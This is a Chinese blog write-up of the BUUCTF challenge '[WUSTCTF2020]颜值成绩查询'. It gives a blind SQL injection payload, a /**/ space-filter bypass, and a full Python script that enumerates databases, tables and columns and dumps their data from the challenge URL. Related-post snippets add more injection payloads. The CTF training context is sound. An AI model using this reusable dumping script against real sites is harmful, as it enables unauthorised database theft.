BUUCTF:[WUSTCTF2020]颜值成绩查询

于 2020-04-07 15:46:23 发布 1292 收藏 2
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/105362098
版权

SQL盲注
2^if(ascii(mid(database(),1,1))>0,0,1);
在这里插入图片描述
先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句
先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本

import requests


def ascii_str():  # 生成库名表名字符所在的字符列表字典
    str_list = []
    for i in range(33, 127):  # 所有可显示字符
        str_list.append(chr(i))
    # print('可显示字符:%s'%str_list)
    return str_list  # 返回字符列表


def db_length(url, str):
    print("[-]开始测试数据库名长度.......")
    num = 1
    while True:
        db_payload = url + "/**/and/**/(length(database())=%d)--+" % num
        r = requests.get(db_payload)
        if str in r.text:
            db_length = num
            print("[+]数据库长度:%d\n" % db_length)
            db_name(db_length)  # 进行下一步,测试库名
            break
        else:
            num += 1


def db_name(db_length):
    print("[-]开始测试数据库名.......")
    db_name = ''
    str_list = ascii_str()
    for i in range(1, db_length + 1):
        for j in str_list:
            db_payload = url + "/**/and/**/(ord(mid(database(),%d,1))='%s')--+" % (i, ord(j))
            r = requests.get(db_payload)
            if str in r.text:
                db_name += j
                break
    print("[+]数据库名:%s\n" % db_name)
    tb_piece(db_name)  # 进行下一步,测试security数据库有几张表
    return db_name


def tb_piece(db_name):
    print("开始测试%s数据库有几张表........" % db_name)
    for i in range(100):  # 猜解库中有多少张表,合理范围即可
        tb_payload = url + "/**/and/**/%d=(select/**/count(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='%s')--+" % (
        i, db_name)
        r = requests.get(tb_payload)
        if str in r.text:
            tb_piece = i
            break
    print("[+]%s库一共有%d张表\n" % (db_name, tb_piece))
    tb_name(db_name, tb_piece)  # 进行下一步,猜解表名


def tb_name(db_name, tb_piece):
    print("[-]开始猜解表名.......")
    table_list = []
    for i in range(tb_piece):
        str_list = ascii_str()
        tb_length = 0
        tb_name = ''
        for j in range(1, 20):  # 表名长度,合理范围即可
            tb_payload = url + "/**/and/**/(select/**/length(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/%d,1)=%d--+" % (
            i, j)
            r = requests.get(tb_payload)
            if str in r.text:
                tb_length = j
                print("第%d张表名长度:%s" % (i + 1, tb_length))
                for k in range(1, tb_length + 1):  # 根据表名长度进行截取对比
                    for l in str_list:
                        tb_payload = url + "/**/and/**/(select/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/%d,1),%d,1)))=%d--+" % (
                        i, k, ord(l))
                        r = requests.get(tb_payload)
                        if str in r.text:
                            tb_name += l
                print("[+]:%s" % tb_name)
                table_list.append(tb_name)
                break
    print("\n[+]%s库下的%s张表:%s\n" % (db_name, tb_piece, table_list))
    column_num(table_list, db_name)  # 进行下一步,猜解每张表的字段数


def column_num(table_list, db_name):
    print("[-]开始猜解每张表的字段数:.......")
    column_num_list = []
    for i in table_list:
        for j in range(30):  # 每张表的字段数量,合理范围即可
            column_payload = url + "/**/and/**/%d=(select/**/count(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='%s')--+" % (
            j, i)
            r = requests.get(column_payload)
            if str in r.text:
                column_num = j
                column_num_list.append(column_num)  # 把所有表的字段,依次放入这个列表当中
                print("[+]%s表\t%s个字段" % (i, column_num))
                break
    print("\n[+]表对应的字段数:%s\n" % column_num_list)
    column_name(table_list, column_num_list, db_name)  # 进行下一步,猜解每张表的字段名


def column_name(table_list, column_num_list, db_name):
    print("[-]开始猜解每张表的字段名.......")
    column_length = []
    str_list = ascii_str()
    column_name_list = []
    for t in range(len(table_list)):  # t在这里代表每张表的列表索引位置
        print("\n[+]%s表的字段:" % table_list[t])
        for i in range(column_num_list[t]):  # i表示每张表的字段数量
            column_name = ''
            for j in range(1, 21):  # j表示每个字段的长度
                column_name_length = url + "/**/and/**/%d=(select/**/length(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='%s'/**/limit/**/%d,1)--+" % (
                j - 1, table_list[t], i)
                r = requests.get(column_name_length)
                if str in r.text:
                    column_length.append(j)
                    break
                for k in str_list:  # k表示我们猜解的字符字典
                    column_payload = url + "/**/and/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='%s'/**/limit/**/%d,1),%d,1))=%d--+" % (
                    table_list[t], i, j, ord(k))
                    r = requests.get(column_payload)
                    if str in r.text:
                        column_name += k
            print('[+]:%s' % column_name)
            column_name_list.append(column_name)
    print(column_name_list)#输出所有表中的字段名到一个列表中
    dump_data(table_list, column_name_list, db_name)  # 进行最后一步,输出指定字段的数据


def dump_data(table_list, column_name_list, db_name):
    print("\n[-]对%s表的%s字段进行爆破.......\n" % (table_list[0], column_name_list[0:2]))
    str_list = ascii_str()
    for i in column_name_list[0:2]:
        for j in range(101):  # j表示有多少条数据,合理范围即可
            data_num_payload = url + "/**/and/**/(select/**/count(%s)/**/from/**/%s.%s)=%d--+" % (i, db_name, table_list[0], j)
            r = requests.get(data_num_payload)
            if str in r.text:
                data_num = j
                break
        print("\n[+]%s表中的%s字段有以下%s条数据:" % (table_list[0], i, data_num))
        for k in range(data_num):
            data_len = 0
            dump_data = ''
            for l in range(1,80):  # l表示每条数据的长度,合理范围即可
                data_len_payload = url + "/**/and/**/ascii(substr((select/**/%s/**/from/**/%s.%s/**/limit/**/%d,1),%d,1))--+" % (
                i, db_name, table_list[0], k, l)
                r = requests.get(data_len_payload)
                if str not in r.text:
                    data_len = l - 1
                    for x in range(1, data_len + 1):  # x表示每条数据的实际范围,作为mid截取的范围
                        for y in str_list:
                            data_payload = url + "/**/and/**/ord(mid((select/**/%s/**/from/**/%s.%s/**/limit/**/%d,1),%d,1))=%d--+" % (
                            i, db_name, table_list[0], k, x, ord(y))
                            r = requests.get(data_payload)
                            if str in r.text:
                                dump_data += y
                                break
                    break
            print('[+]%s' % dump_data)  # 输出每条数据


if __name__ == '__main__':
    url = "http://4256ba7d-df27-4dd7-bc5d-ed2125b3b1c1.node3.buuoj.cn/?stunum=1"  # 目标url
    str = "Hi admin"  # 布尔型盲注的true&false的判断因素
    db_length(url, str)  # 程序入口

在这里插入图片描述

末 初
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 453
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 319
[WUSTCTF2020]颜值成绩查询(布尔注入)
buuctf-颜值成绩查询(sql注入)
一直在水些技术小文
05-19 427
输入1-4都是可以的,从5开始就不存在了 多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了 但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists 尝试一下异或注入 输入10正确,1错误,说明是异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果 错误的结果是这样的 通过这个可以最终得到f..
[WUSTCTF2020]颜值成绩查询
azraelxuemo的博客
07-23 197
一上来可以发现是数字类型盲注 显示的是1的界面 那么可以利用之前[极客大挑战 2019]FinalSQL1的脚本进行跑 利用^异或进行盲注 首先爆数据库名 import requests import time database_all = '' url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1' # 求出总长度的位数,比如说如果总长度为43,那么就是2位数 weishu = '' for i in
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF Reverse CrackRTF-附件资源
03-02
BUUCTF Reverse CrackRTF-附件资源
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
ORACLE第2天
07-28
NULL 博文链接:https://ws694617206.iteye.com/blog/773606
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几...
android:SqlTest
11-11
android:SqlTest连接本地数据
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜...得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Crypto boom
01-20
题目 原创文章 58获赞 99访问量 8393 关注 私信 展开阅读全文 作者:你们这样一点都不可耐
buuctf misc wireshark
最新发布
05-23
<h3>回答1:</h3><br/>Wireshark是一种开源的网络封包分析软件,可以捕获和分析网络上的数据包。它可以用于网络故障排除、应用程序调试和网络安全监测等。在CTF比赛中,通常会使用Wireshark来分析网络数据包,以找到隐藏的信息。 <h3>回答2:</h3><br/>buuctf misc wireshark是一个关于网络协议分析的比赛项目。Wireshark是一款开源的网络数据包分析软件,可以捕获网络数据包并对其进行分析。比赛中,参赛者需要使用Wireshark分析给出的网络数据包,解答问题。 对于参赛者来说,需要掌握一定的网络协议知识,如TCP/IP协议、HTTP协议等,以便能够准确地理解和解读数据包。在使用Wireshark时,需要学会使用过滤器、分析器、统计功能等工具,以提高效率和准确度。同时,熟练掌握Wireshark的界面和操作方式也是必要的,可以节省大量的时间和精力。 在比赛中,通常会给出一些需求或问题,参赛者需要通过分析数据包找到相应的解答或证据。这需要参赛者具备分析、推理、和归纳总结的能力。比如,在一个数据包中找到指定的关键字或特征;在多个数据包中找到某种流程或交互行为;根据数据包分析出攻击来源、目标、手段等等。 总体来说,buuctf misc wireshark是一个考验网络协议分析能力、技术积累和思维能力的比赛项目,参赛者需要不断学习和提高自身的技术水平,才能在比赛中取得优异的成绩。 <h3>回答3:</h3><br/>BUUCTF Misc Wireshark 是一道Misc类题目,主要涉及的是网络协议分析工具Wireshark的应用和技能。 Wireshark是一款免费开源的网络协议分析工具,它能够对网络数据包进行捕捉、分析和显示,能够帮助用户深入了解网络协议的细节,从而找到网络通信中的问题、漏洞等。 在这道BUUCTF Misc Wireshark题目中,参赛者需要下载给定的pcap文件,并使用Wireshark工具进行分析。根据题目提示,我们可以知道这是一段捕获到的网络流量,目的是要从流量中找到flag,需要注意的是,flag需要用特定的格式进行提交。 在进行分析之前,我们需要对Wireshark工具有一个基本的了解,例如如何打开pcap文件、如何过滤、如何查看某个特定的数据包、如何解码以及在分析过程中需要留意的一些细节等等。 在分析过程中,我们需要仔细观察每一个数据包的内容和协议,特别是HTTP、TCP、UDP和DNS等常见协议。我们需要通过协议头和数据包载荷中的信息来确定是否有关键信息,如有关键信息,我们需要使用Wireshark提供的一些工具进行解析,从而进一步分析。比如可以使用Wireshark的工具分析HTTP请求和响应的报文头和报文体,使用Wireshark的工具解析DNS请求和响应的域名记录等等。 除此之外,我们还需要留意在分析过程中可能出现的数据包篡改、数据包分片、数据包顺序不同、进程挂起和死锁等现象,这些现象有可能会影响我们的分析结果。 综上所述,BUUCTF Misc Wireshark需要参赛者具备一定的网络协议知识和Wireshark分析工具的技能,在分析过程中需要仔细观察,注重细节,才能够准确的找到flag,完成题目的挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值